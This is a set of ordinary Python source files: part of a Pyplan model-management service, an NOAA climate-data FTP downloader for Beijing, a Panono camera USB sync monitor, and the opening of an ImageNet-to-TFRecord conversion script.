res.name = calcEngine.getModelName()
res.uri = file
# TODO: revisit once licensing is in place
res.daysToExpire = 365
_modelPreferences = calcEngine.getModelPreferences()
res.modelId = _modelPreferences["identifier"] if "identifier" in _modelPreferences else ""
res.onOpenModel = _modelPreferences["onOpenModel"] if "onOpenModel" in _modelPreferences else ""
res.onOpenDashId = _modelPreferences["onOpenDashId"] if "onOpenDashId" in _modelPreferences else ""
if not calcEngine.from_app_pool:
res.engineUID = calcEngine.getEngineUID()
res.engineURI = calcEngine.getEngineURI()
res.engineParams = calcEngine.getEngineParams()
self.saveSession()
calcEngine = None
if res is not None:
is_public = False
can_edit = False
if "/public/" in file.lower():
is_public = True
if self.current_user.has_perm("pyplan.change_model") \
and not is_public or self.current_user.has_perm("pyplan.change_public_model") \
and is_public:
can_edit = True
res.canEdit = can_edit
res.readonly = not can_edit
# check whether another session has this model open, to mark it as read-only
try:
for db_session in self.session_store.get_model_class().objects.all():
_decoded = db_session.get_decoded()
if "data" in _decoded and "modelInfo" in _decoded["data"] \
and _decoded["data"]["modelInfo"]["uri"] == file \
and int(_decoded["data"]["userCompanyId"]) != self.getSession().userCompanyId \
and not _decoded["data"]["modelInfo"]["readonly"]:
res.readonly = True
res.readOnlyReason = f"The model is being used by '{_decoded['data']['userFullName']}'. The model will be opened in read-only mode."
break
except Exception as ex:
print(
f"Error checking other session for mark as readonly: {str(ex)}")
self.saveSession()
return res
def getModelInfo(self):
"""Navigate Diagram"""
session = self.client_session
if session is not None:
modelInfo = session.modelInfo
storage = FileSystemStorage()
file_path = join(settings.MEDIA_ROOT, "models", modelInfo.uri)
file_size = storage.size(file_path)
if file_size > 1e+6:
file_size = f"{round(file_size / 1024 / 1024, 2)} MB"
else:
if file_size > 1e+3:
file_size = f"{round(file_size / 1024, 2)} kB"
else:
file_size = f"{file_size} B"
created_time = storage.get_created_time(file_path)
modified_time = storage.get_modified_time(file_path)
modelInfo.uri
res = [
{"Key": "modelinfo_model_id", "Value": modelInfo.modelId},
{"Key": "modelinfo_model_name", "Value": modelInfo.name},
{"Key": "modelinfo_model_file", "Value": modelInfo.uri},
{"Key": "modelinfo_file_size", "Value": file_size},
{"Key": "modelinfo_created_date",
"Value": f"{created_time.strftime('%Y-%m-%d %H:%M')} hs."},
{"Key": "modelinfo_updated_date",
"Value": f"{modified_time.strftime('%Y-%m-%d %H:%M')} hs."},
]
return res
else:
raise exceptions.NotAcceptable("Can't find session")
def saveModel(self):
"""Saves Model"""
calcEngine = CalcEngine.factory(self.client_session)
file_path = join(settings.MEDIA_ROOT, "models",
self.client_session.modelInfo.uri)
return calcEngine.saveModel(file_path)
def saveModelAs(self, modelName):
"""Saves Model With New Name"""
if self.checkModelOpen():
currentPath = self.client_session.modelInfo.uri
folderPath = currentPath[:currentPath.rfind(os.path.sep)+1]
file_path = join(folderPath, f'{modelName}.ppl')
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
if not storage.exists(file_path):
calcEngine = CalcEngine.factory(self.client_session)
try:
fullPath = join(storage.base_location, file_path)
newModel = calcEngine.saveModel(fullPath)
current_session = self.getSession()
res = current_session.modelInfo
res.uri = file_path
self.saveSession()
calcEngine = None
return res
except Exception as ex:
raise exceptions.ErrorDetail(
f'Error when saving the model: {str(ex)}')
raise exceptions.NotAcceptable(
"The file name you provide already exists")
raise exceptions.NotAcceptable("There's no currentModel")
def navigateDiagram(self, module_id, include_arrows):
"""Navigate Diagram"""
calcEngine = CalcEngine.factory(self.client_session)
res = None
if module_id:
res = calcEngine.getDiagram(module_id)
else:
res = calcEngine.getDiagram()
return res
def getArrows(self, module_id):
"""Get Diagram Arrows"""
calcEngine = CalcEngine.factory(self.client_session)
if not module_id:
current_session = self.getSession()
module_id = current_session.modelInfo.modelId
return {
"arrows": calcEngine.getArrows(module_id),
"module_id": module_id
}
def getToolbars(self):
"""Get Toolbars"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.getToolbars(join(settings.MEDIA_ROOT, 'models', self.client_session.companyName))
def createNewModel(self, modelName):
"""Creates a new model """
try:
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
folderSufix = 1
new_model_name = modelName
while storage.exists(join(storage.base_location, new_model_name)):
folderSufix += 1
new_model_name = f'{modelName}_{folderSufix}'
folder_path = join(storage.base_location, new_model_name)
model_file = join(folder_path, f'{new_model_name}.ppl')
if not storage.exists(folder_path):
os.mkdir(folder_path)
calcEngine = CalcEngine.factory(self.client_session)
if calcEngine.createNewModel(model_file, new_model_name):
self.closeModel()
return self.openModel(join(storage.base_location, new_model_name, f'{new_model_name}.ppl'))
except Exception as ex:
raise ex
def getModelPreferences(self):
"""Get Model Preferences"""
calcEngine = CalcEngine.factory(self.client_session)
engineResponse = calcEngine.getModelPreferences()
# fill default preferences
engineResponse["modelId"] = engineResponse["identifier"]
if not "changeIdentifier" in engineResponse:
engineResponse["changeIdentifier"] = "1"
return engineResponse
def changeToOtherModelSession(self, new_session_key):
"""Change to other model of the current user session
"""
if self.existSession(new_session_key):
new_session = self.getSessionByKey(new_session_key)
if self.getSession().userCompanyId == new_session.userCompanyId:
uri = new_session.modelInfo.uri
return self.openModel(uri)
else:
raise exceptions.PermissionDenied()
else:
raise exceptions.PermissionDenied()
def setModelPreferences(self, modelPreferences):
"""Set model preferences"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.setModelProperties(modelPreferences)
if result.text == 'ok':
model_pref = ModelPreference(**modelPreferences)
if model_pref.identifier or model_pref.title:
self.client_session.modelInfo.modelId = model_pref.identifier
self.client_session.modelInfo.name = model_pref.title
self.saveSession()
return self.client_session
return False
def closeModel(self):
"""Close current model"""
if self.checkModelOpen():
calcEngine = CalcEngine.factory(self.client_session)
if calcEngine.closeModel():
current_session = self.getSession()
current_session.modelInfo = ModelInfo()
self.saveSession()
else:
return False
return True
# node related methods
def getNodeProperties(self, node_id, properties):
"""Get Node Properties"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getNodeProperties(node_id, properties)
return result
def setNodeProperties(self, node_id, properties):
"""Set Node Properties"""
# map same properties
if node_id and len(properties) > 0:
for prop in properties:
if prop["name"] and prop["name"].lower() == "picture":
if not prop["value"]:
prop["value"] = None
else:
file_extension = prop["value"].rsplit(".").pop()
file_path = join(settings.MEDIA_ROOT, 'tmp', prop['value'])
with open(file_path, "rb") as image_file:
prop["value"] = f'data:image/{file_extension};base64,{str(base64.b64encode(image_file.read()), "utf-8")}'
try:
os.remove(file_path)
except Exception as ex:
raise exceptions.NotAcceptable(
f'There was an error deleting the tempfile:{str(ex)}')
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.setNodeProperties(node_id, properties)
return result
def getNodeInputs(self, node_id):
"""Get Node Inputs"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getNodeInputs(node_id)
return result
def getNodeOutputs(self, node_id):
"""Get Node Outputs"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getNodeOutputs(node_id)
return result
def searchNodes(self, text, module_id, node_class, extra_classes, fill_detail):
"""Search Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.searchNodes(
text, module_id, node_class, extra_classes, fill_detail)
return result
def searchForAutocomplete(self, text):
"""Search for autocomplete definition"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.searchNodes(text, None, None, [], True)
return result
def previewNode(self, node, debugMode=""):
"""Evaluate and return node result preview"""
self.checkModelOpen()
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.previewNode(node, debugMode)
def evaluate(self, definition):
"""Evaluate definition and return result"""
self.checkModelOpen()
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.evaluate(definition)
def callFunction(self, nodeId, params):
"""Call node function"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.callFunction(nodeId, params)
def setNodesSize(self, values):
"""Set nodes size"""
calcEngine = CalcEngine.factory(self.client_session)
try:
for value in values:
# ToDo: return an array of engine responses
calcEngine.setNodeProperties(value["id"], [
{"name": "x", "value": value["x"]},
{"name": "y", "value": value["y"]},
{"name": "w", "value": value["w"]},
{"name": "h", "value": value["h"]},
])
return True
except Exception as ex:
raise ex
def setNodesPosition(self, values):
"""Set nodes position"""
calcEngine = CalcEngine.factory(self.client_session)
try:
for value in values:
# ToDo: return an array of engine responses
calcEngine.setNodeProperties(value["id"], [
{"name": "x", "value": value["x"]},
{"name": "y", "value": value["y"]},
{"name": "w", "value": value["w"]},
{"name": "h", "value": value["h"]},
])
return True
except Exception as ex:
raise ex
def getNodeProfile(self, node_id):
"""Get Node Profile"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.profileNode(node_id)
def createNode(self, node):
"""create Node"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.createNode(node)
def deleteNodes(self, node_ids):
"""delete Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.deleteNodes(node_ids)
def createAlias(self, node_ids):
"""create Alias"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.createAlias(node_ids)
def createInputNode(self, node_ids):
"""create Input Node"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.createInputNode(node_ids)
def copyNodes(self, nodes):
"""copy Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.copyNodes(nodes)
def copyAsValues(self, params):
"""copy Nodes as values"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.copyAsValues(params)
def moveNodes(self, nodes):
"""move Nodes"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.moveNodes(nodes)
def stop(self):
"""Try to stop current process"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.stop()
def setNodeZ(self, nodes):
"""Sets the Z position of a node"""
newZ = 1
for node in nodes:
newZ = node.z
try:
self.setNodeProperties(node.id, [{"name": "z", "value": newZ}])
return True
except Exception as ex:
raise exceptions.NotAcceptable(
f"Error trying to set the node z property:{str(ex)}")
def setNodeIdFromTitle(self, node_id):
"""Sets the nodeId from its title"""
calcEngine = CalcEngine.factory(self.client_session)
new_id = calcEngine.setNodeIdFromTitle(node_id)
return new_id["node_id"]
def executeForRefresh(self):
"""Executes a node from the refresh button"""
value = random.randint(1, 10000000)
calcEngine = CalcEngine.factory(self.client_session)
calcEngine.setNodeProperties(
"pyplan_refresh", [{"name": "definition", "value": "result = " + str(value)}])
return calcEngine.setNodeProperties("cub_refresh", [{"name": "definition", "value": "result = " + str(value)}])
def exportFlatNode(self, exportData):
"""Export flat node to file"""
file_path = join(
settings.MEDIA_ROOT, 'tmp', f'{exportData.nodeId}.{exportData.fileFormat.lower()}')
identifier = self.getNodeProperties(
exportData.nodeId, [{"name": "identifier", "value": ""}])
original = identifier['properties'][0]['value']
calcEngine = CalcEngine.factory(self.client_session)
response = calcEngine.exportFlatNode(
original,
exportData.numberFormat,
exportData.columnFormat,
file_path
)
if response == 1:
if exportData.compressed == "1":
temp = tempfile.SpooledTemporaryFile()
with zipfile.ZipFile(temp, 'w', zipfile.ZIP_DEFLATED) as zfobj:
zfobj.write(file_path)
for zfile in zfobj.filelist:
zfile.create_system = 0
temp.seek(0)
return temp, f'{file_path[file_path.rfind(os.path.sep)+1:file_path.rfind(".")]}.zip'
return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]
raise exceptions.NotAcceptable("Engine couldn't create file")
def exportCurrentNode(self, exportData, dashboardManagerService):
"""Export node (current table) to file"""
file_path = join(
settings.MEDIA_ROOT, 'tmp', f'{exportData.nodeId}.{exportData.fileFormat.lower()}')
identifier = self.getNodeProperties(
exportData.nodeId, [{"name": "identifier", "value": ""}])
original = identifier['properties'][0]['value']
decimalSep = "."
if exportData.columnFormat == 'tab':
exportData.columnFormat = '\t'
if exportData.numberFormat == 'TSPDSC':
decimalSep = ","
# ToDo: Don't call a service from a service
data = dashboardManagerService._evaluateNode(
original,
exportData.nodeQuery.dims,
exportData.nodeQuery.rows,
exportData.nodeQuery.columns,
exportData.nodeQuery.summaryBy,
0,
sys.maxsize,
exportData.nodeQuery.bottomTotal,
exportData.nodeQuery.rightTotal
)
with open(file_path, 'w') as f:
# first row
f.write(data.indexOnRow)
# column names
for cat in data.columns.categories:
f.write(exportData.columnFormat)
f.write(cat)
f.write('\n')
# data
for item in data.series:
f.write(str(item.name))
f.write(exportData.columnFormat)
for d in item.data:
f.write(str(d).replace(".", decimalSep) if isinstance(d, Number) else str(d))
f.write(exportData.columnFormat)
f.write('\n')
if exportData.compressed == "1":
temp = tempfile.SpooledTemporaryFile()
with zipfile.ZipFile(temp, 'w', zipfile.ZIP_DEFLATED) as zfobj:
zfobj.write(file_path)
for zfile in zfobj.filelist:
zfile.create_system = 0
temp.seek(0)
return temp, f'{file_path[file_path.rfind(os.path.sep)+1:file_path.rfind(".")]}.zip'
return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]
def exportModuleToFile(self, exportData):
"""Export module to file"""
calcEngine = CalcEngine.factory(self.client_session)
file_path = join(settings.MEDIA_ROOT, 'tmp', f'{exportData.moduleId}.ppl')
if exportData.exportType != "1":
storage = FileSystemStorage(
join(settings.MEDIA_ROOT, 'models'))
currentPath = self.client_session.modelInfo.uri
folderPath = currentPath[:currentPath.rfind(os.path.sep)+1]
file_path = join(
storage.base_location, folderPath, f'{exportData.moduleId}.ppl')
response = calcEngine.exportModule(exportData.moduleId, file_path)
if response == 1:
return open(file_path, 'rb'), file_path[file_path.rfind(os.path.sep)+1:]
raise exceptions.NotAcceptable("Engine couldn't create file")
def importModuleFromFile(self, importModuleData):
"""Import module from file"""
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
currentPath = self.client_session.modelInfo.uri
importModuleData.currentModelPath = join(storage.base_location, currentPath)
fullFileName = join(settings.MEDIA_ROOT, 'tmp', importModuleData.moduleFile)
if not importModuleData.fromTemp:
fullFileName = join(storage.base_location, importModuleData.moduleFile)
if (importModuleData.importType.name == eImportType(0).name) or (importModuleData.importType.name == eImportType(2).name):
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.importModule(importModuleData.parentModelId,
fullFileName, str(importModuleData.importType.value))
if result:
importModuleData.importType = importModuleData.importType.value
if importModuleData.fromTemp:
os.remove(fullFileName)
return importModuleData
raise exceptions.NotAcceptable("Error importing module")
# TODO: implement eImportType(1).name (APPEND) case
raise exceptions.NotAcceptable("Import Type 'APPEND' not implemented")
def getFilesForImportWizard(self, extension):
"""
Get files for use in import wizard
"""
storage = FileSystemStorage(join(settings.MEDIA_ROOT, 'models'))
folderPath = self.client_session.modelInfo.uri[:self.client_session.modelInfo.uri.rfind(
os.path.sep)+1]
fullFolderPath = join(storage.base_location, folderPath)
return self._findFilesEntriesInFolderByExtension(fullFolderPath, f'.{extension}', True, [])
def callWizard(self, wizardRequest):
"""
Call toolbar wizard
"""
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.callWizard(wizardRequest)
def executeButton(self, nodeId):
"""
Execute script of button
"""
identifierPropertie = self.getNodeProperties(
nodeId, [{"name": "identifier", "value": ""}])
identifier = identifierPropertie['properties'][0]['value']
if self.existSession(self.client_session.session_key):
if not self.isInBackground(identifier):
# start new executeButtonThread
thread = threading.Thread(
target=self._executeButtonThread, args=[nodeId])
thread.daemon = True
thread.start()
# otherwise the node is already running in the background; report success either way
return True
raise exceptions.NotAcceptable(
"executeButton - There's no session")
def isInBackground(self, nodeId):
"""
Returns true if the node is executing in another thread
"""
identifierPropertie = self.getNodeProperties(
nodeId, [{"name": "identifier", "value": ""}])
identifier = identifierPropertie['properties'][0]['value']
if self.existSession(self.client_session.session_key):
return (self.client_session.modelInfo.nodeIdInBackground == identifier)
raise exceptions.NotAcceptable("isInBackground - There's no session")
def getSelector(self, node):
"""Return selector object definition"""
self.checkModelOpen()
calcEngine = CalcEngine.factory(self.client_session)
return calcEngine.getSelector(node)
# helper functions
def uploadFile(self, action, my_file, folder_path, name, chunk):
return _uploadFile(action, my_file, folder_path, name, chunk, False)
def _removeDiacritics(self, text):
"""Removes all diacritic marks from the given string"""
norm_txt = unicodedata.normalize('NFD', text)
shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))
# remove accents and other diacritics, replace spaces with "_" because identifiers can't have spaces
no_spaces = unicodedata.normalize(
'NFC', shaved).lower().replace(" ", "_")
final_text = no_spaces
# only allow [a-z], [0-9] and _
p = re.compile('[a-z0-9_]+')
for i in range(0, len(no_spaces)):
if not (p.match(no_spaces[i])):
final_text = final_text[:i] + '_' + final_text[i+1:]
# if the first char is not a-z then replace it (all identifiers must start with a letter)
p2 = re.compile('[a-z]+')
if not p2.match(final_text[0]):
final_text = 'a' + final_text[1:]
return final_text
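# Illustrative worked examples (hypothetical inputs, not from the original source):
#   self._removeDiacritics("Año Café 2024")  -> "ano_cafe_2024"
#   self._removeDiacritics("2nd model")      -> "and_model"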
def _findFilesEntriesInFolderByExtension(self, path, extension, subFolders=True, pathList=[]):
""" Recursive function to find all files of an extension type in a folder (and optionally in all subfolders too) and returns them as file entries
path: Base directory to find files
pathList: A list that stores all paths
extension: File extension to find (example = txt)
subFolders: Bool. If True, find files in all subfolders under path. If False, only searches files in the specified folder
"""
try:
for entry in os.scandir(path):
if entry.is_file() and entry.path.endswith(extension):
fileStats = os.stat(entry.path)
# TODO: check why this always returns specialfolder type 0 even for public, my folder, etc.
# It was like this in the .NET version, but it should be reviewed.
fileEntry = FileEntry(
text=str(entry.path[entry.path.rfind(os.path.sep)+1:]),
type=eFileTypes.NOTHING,
data=FileEntryData(
# fullPath=entry.path,
fullPath=str(entry.path[entry.path.rfind(os.path.sep)+1:]),
fileSize=fileStats.st_size,
lastUpdateTime=datetime.datetime.fromtimestamp(
fileStats.st_mtime).isoformat()
)
)
pathList.append(fileEntry)
elif entry.is_dir() and subFolders: # if it's a directory, recurse into it
pathList = self._findFilesEntriesInFolderByExtension(
entry.path, extension, subFolders, pathList)
except OSError:
print('Cannot access ' + path + '. Probably a permissions error')
return pathList
def _executeButtonThread(self, identifier):
try:
"""
Dim thEngineUID As String = args(0)
Dim thRestClient As RestApiClient.RestClient = args(1)
Dim identifier As String = args(2)
Dim token As String = args(3)
Dim thCubengineManager As CubengineManager = args(4)
Dim nodeJSClient As NodeJsClient = args(5)
Dim modelData As Object = args(6)
"""
self.client_session.modelInfo.nodeIdInBackground = identifier
self.saveSession()
# TODO: Notify to nodejs that the thread has finished
# Dim message As Object = New System.Dynamic.ExpandoObject()
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.executeButton(identifier)
#message.error = False
#message.result = evalResult
# Notify to WebSocket channel that the thread has finished
sysMsg(
self.client_session.session_key,
ws_settings.MSG_TYPE_MESSAGE,
ws_settings.NOTIFICATION_LEVEL_SUCCESS,
content={
'title': 'Finished processing.',
'message': f'ID: {identifier}',
}
)
except Exception as ex:
error_msg = f'Error when performing execute button thread: {str(ex)}'
# Notify to WebSocket channel that the thread has finished with error
sysMsg(
self.client_session.session_key,
ws_settings.MSG_TYPE_MESSAGE,
ws_settings.NOTIFICATION_LEVEL_ERROR,
content={
'title': 'Finished processing with errors',
'message': error_msg,
}
)
raise exceptions.NotAcceptable(error_msg)
finally:
self.client_session.modelInfo.nodeIdInBackground = ''
self.saveSession()
def installLibrary(self, lib):
"""Install python library"""
calcEngine = CalcEngine.factory(self.client_session)
pos = self.client_session.modelInfo.uri.find("/", self.client_session.modelInfo.uri.find("/", 1)+1)
current_path = self.client_session.modelInfo.uri[:pos]
target_path = join(settings.MEDIA_ROOT, 'models', current_path)
result = calcEngine.installLibrary(lib, target_path)
return result
def listInstalledLibraries(self):
"""List python installed libraries"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.listInstalledLibraries()
return result
def uninstallLibrary(self, lib, target):
"""Uninstall python library"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.uninstallLibrary(lib, target)
return result
def getInstallProgress(self, from_line):
"""Get install python library progress"""
calcEngine = CalcEngine.factory(self.client_session)
result = calcEngine.getInstallProgress(from_line)
return result
|
get_beijing_weather.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Download all climate data from the national meteorological archive (VPN connection required).
"""
import os
import re
import threading
from ftplib import FTP
from time import sleep
def ftp_get_data(tid, n, step):
# year: 1901 - 2017
# pattern = r"[12][09][0-9]{2}"
start = n
end = n + step - 1
if n == 1:
start = 0
pattern = "[12][09][{}-{}][0-9]".format(start, end)
print(pattern)
match_year = re.compile(pattern)
# Download path
# Station ID list: ftp://ftp.ncdc.noaa.gov/pub/data/noaa/isd-history.txt
output = "bj"
bj_id = "545110" # USAF
if not os.path.exists(output):
os.mkdir(output)
else:
print("{} is exists".format(output))
while True:
try:
with FTP() as ftp:
ftp.set_debuglevel(2)
ftp.connect("ftp.ncdc.noaa.gov", 21, 60)
ftp.login() # anonymous login (user=anonymous, passwd='')
ftp.getwelcome()
ftp.cwd("pub/data/noaa/")
ftp.set_debuglevel(0)
files = ftp.nlst()
for name in files:
result = match_year.match(name)
if result is not None:
for gzfile in ftp.nlst(name):
print("[thread-{}] check {}".format(tid, gzfile))
ret = re.search(bj_id, gzfile)
if ret is None:
continue
year_dir = output + "/" + name
if not os.path.exists(year_dir):
os.mkdir(year_dir)
print("[thread-{}]Downloading:{} ".format(tid, gzfile))
outfile = output + "/" + gzfile
if os.path.exists(outfile):
continue
with open(outfile, 'wb') as f:
ftp.retrbinary("RETR " + gzfile, f.write, 2048)
# Download the climate data format documentation
formatdoc = "ish-format-document.pdf"
doc = output + "/" + formatdoc
if not os.path.exists(doc):
with open(doc, "wb") as f:
ftp.retrbinary("RETR " + formatdoc, f.write, 1024)
break
except Exception as err:
print(err)
sleep(3)
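# Illustrative note (worked example, not from the original source): with
# step = 5 the two worker threads compile the patterns "[12][09][0-4][0-9]"
# and "[12][09][5-9][0-9]", so one thread walks the 1900-1949 / 2000-2049
# year directories and the other walks 1950-1999 / 2050-2099, covering the
# 1901-2017 archive for station 545110 (Beijing) without overlap.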
if __name__ == "__main__":
# The FTP server allows at most 2 concurrent connections
threads = []
step = 5
nloops = range(0, 9, step)
for i in nloops:
t = threading.Thread(target=ftp_get_data, args = (i, i, step))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
|
usb_monitor.py
|
import argparse
import logging
import pathlib
import threading
import time
import requests
import sh
import usb1
from sync import synchronize
MOUNT_POINT = "/tmp/mtp-mount"
log = logging.getLogger(__name__)
args = None
def _mount_device(device):
try:
product_name = device.getProduct()
except:
log.info("Unable to get product name of USB device, ignoring")
return
if not product_name or not product_name.startswith("Panono"):
return
log.info("Panono detected: %s", product_name)
tmpdirname = MOUNT_POINT
# Create mount directories if needed
tmpdir = pathlib.Path(tmpdirname)
tmpdir.mkdir(parents=True, exist_ok=True)
# Mount the device
mtp_process = sh.go_mtpfs("-android=false", tmpdirname, _bg=True)
log.info("Device mounted on: %s", tmpdirname)
time.sleep(1.5)
# Synchronize the files
synchronize(tmpdirname, args.destination, args.email, args.password)
# Unmount the device
time.sleep(1.0)
try:
mtp_process.terminate()
finally:
sh.sudo("umount", tmpdirname)
log.info("Device unmounted")
def hotplug_callback(context, device, event):
log.info("Device %s: %s" % (
{
usb1.HOTPLUG_EVENT_DEVICE_ARRIVED: 'arrived',
usb1.HOTPLUG_EVENT_DEVICE_LEFT: 'left',
}[event],
device,
))
# Note: cannot call synchronous API in this function.
if event == usb1.HOTPLUG_EVENT_DEVICE_ARRIVED:
thread = threading.Thread(target = _mount_device, args = (device, ))
thread.start()
def monitor_devices():
with usb1.USBContext() as context:
if not context.hasCapability(usb1.CAP_HAS_HOTPLUG):
log.error('Hotplug support is missing. Please update your libusb version.')
return
log.info('Registering hotplug callback...')
opaque = context.hotplugRegisterCallback(hotplug_callback)
log.info('Callback registered. Monitoring events, ^C to exit')
try:
while True:
context.handleEvents()
except (KeyboardInterrupt, SystemExit):
log.info('Exiting')
def _parse_arguments():
parser = argparse.ArgumentParser(description='Downloads UPF from the Panono.')
parser.add_argument('-e', '--email', dest="email", required=True, help='E-mail used for logging in on panono.com')
parser.add_argument('-p', '--password', dest="password", required=True, help='Password used for logging in on panono.com')
parser.add_argument('destination', help='Storage directory')
return parser.parse_args()
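# Minimal usage sketch (hypothetical credentials and path, not from the
# original source): monitor for a Panono camera and mirror its UPF files into
# a local directory:
#
#   python usb_monitor.py -e user@example.com -p secret /data/panono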
def _init_logging():
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
def main():
global args
_init_logging()
args = _parse_arguments()
monitor_devices()
if __name__ == '__main__':
main()
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around 2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
# import google3
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_boxes.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
